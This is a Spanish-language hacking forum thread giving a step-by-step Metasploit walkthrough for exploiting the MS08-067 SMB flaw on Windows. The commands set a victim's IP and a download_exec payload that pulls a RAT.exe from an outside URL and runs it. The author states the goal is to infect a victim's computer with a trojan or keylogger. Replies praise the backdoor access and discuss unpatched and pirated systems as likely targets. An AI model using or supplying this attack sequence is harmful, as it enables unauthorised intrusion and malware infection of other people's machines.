Bueno vamos a setear el exploit netapi para Windows_OS

Código: Seleccionar todo

use windows/smb/ms08_067_netapi
Vamos a setare igualemente el target

Código: Seleccionar todo

set target 0
Ya con estoy, podemos elegir nuestro payload y vamos a usar download_exec

Código: Seleccionar todo

set payload windows/download_exec
Ahora seteamos el rhost y aqui sebe de ser la direccion ip de la victima....

Código: Seleccionar todo

set RHOST 127.0.0.0 
Yo puse 127.0.0.0 ustees pongan la de la victima.

Y bueno de echo es muy simple ahora vamos a setear el URL donde tenemos nuestro troyano/malware/exploit/keylogger(u lo que sea).

Código: Seleccionar todo

set URL http://indetectables.net/priv8/RAT.exe
en el url ustedes pongan donde esta alojado su malware..

Ok ya tenemos todos solo un detalle y es que el link que ponga tiene que ser descarga directa si no no se va a ejecutar...

Vamos a poner lo mas dificil de todo...

Código: Seleccionar todo

exploit
y listo ! Con esto consegimos infectar un ordenador con sistema operativo windows contan solo tener un malware y la direccion ip! y logicamente metasploit!

Saludos a todos y espero les sea util!
1337 & culture!
Gracias por el post seguro que le servirá de ayuda a mucha gente que lo ande buscando. Además ese payload es muy útil si lo que quieres es tener un backdoor y control total sobre la máquina.
Gracias
Si por cada vulnerabilidad en Windows muriese una persona solo quedaríamos tú y yo.
si pero puedes usar otro exploit, ya que ese a nada que el windows reciba actualizacion ya no es vulnerable xddd.
Si por cada vulnerabilidad en Windows muriese una persona solo quedaríamos tú y yo.
Bueno como dice osni netapi en el 2012? Es lo mismo que usar windows en el 2012.... xD Saludos!
1337 & culture!
juhscr escribió:Bueno como dice osni netapi en el 2012? Es lo mismo que usar windows en el 2012.... xD Saludos!
Jajajajaj! cuanta razon tienes compañero
Si por cada vulnerabilidad en Windows muriese una persona solo quedaríamos tú y yo.
Y creedme hoy en dia hay gente que no sabe ni actualizar su sistema! y esto sige siendo funcional hoy en dia! nunca se sabe que se te pondra enfrente!
1337 & culture!
disculpa, sabes si esto funciona a pesar de que la otra parte se conecte a través de una red (router)? gracias
juhscr escribió:Y creedme hoy en dia hay gente que no sabe ni actualizar su sistema! y esto sige siendo funcional hoy en dia! nunca se sabe que se te pondra enfrente!
en eso si tienes razon bro voy a probarlo

saludos
==\\El bien y el mal son solo palabras, lo que uno haga es lo que cuenta//==
KHC escribió:Y creedme hoy en dia hay gente que no sabe ni actualizar su sistema! y esto sige siendo funcional hoy en dia! nunca se sabe que se te pondra enfrente!
Que importa eso? para eso al instalar el mismo te da la posibilidad de activar actualizaciones automáticas... Opción que eligen el... ¿100% de técnicos que instalan este SO? al vender un pc xD. Pero bueno, de todo te puedes encontrar, si
Soy un camaleón, en tu cama, leona ♪
$DoC escribió:
KHC escribió:Y creedme hoy en dia hay gente que no sabe ni actualizar su sistema! y esto sige siendo funcional hoy en dia! nunca se sabe que se te pondra enfrente!
Que importa eso? para eso al instalar el mismo te da la posibilidad de activar actualizaciones automáticas... Opción que eligen el... ¿100% de técnicos que instalan este SO? al vender un pc xD. Pero bueno, de todo te puedes encontrar, si
bueno si muchos que compran un equipo

pero que hay de las personas que tienen su SO pirata? que es lo primero que hacen? según las ultimas encuestas que se han hecho por ejemplo en argentina cual es el indice de piratería entre 60% y 75% incluyendo a empresa

yo lo pensaría
el puto de DSR! escribió:asi que si les rompen el culo que se curtan porque si es una pagina warez no la quieran disfrazar.
es como si me pusiera una pagina porno y dijera que es de "fotografia y videos artisticos"
Responder

Volver a “Exploits”